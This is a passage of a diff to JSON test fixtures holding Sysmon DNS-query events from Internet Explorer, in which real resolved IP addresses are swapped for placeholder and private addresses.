rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.604" }, @@ -5713,7 +5713,7 @@ "@timestamp": "2021-05-05T15:30:51.707Z", "winlog": { "event_data": { - "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.621", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5745,7 +5745,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5757,7 +5757,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5771,7 +5771,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.822", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5814,7 +5814,7 @@ "ProcessId": "2736", "QueryName": "status.thawte.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -5829,7 +5829,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5841,7 +5841,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5849,7 +5849,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;", + "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.860", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5892,7 +5892,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -5905,7 +5905,7 @@ "version": 5, "time_created": "2019-07-18T03:34:06.051Z", "event_data": { - "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.904", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5933,7 +5933,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -5951,7 +5951,7 @@ "ProcessId": "2736", "QueryName": "match.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;", + "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -5994,7 +5994,7 @@ "ProcessId": "2736", "QueryName": "img-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;", + "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.056" }, @@ -6004,7 +6004,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData 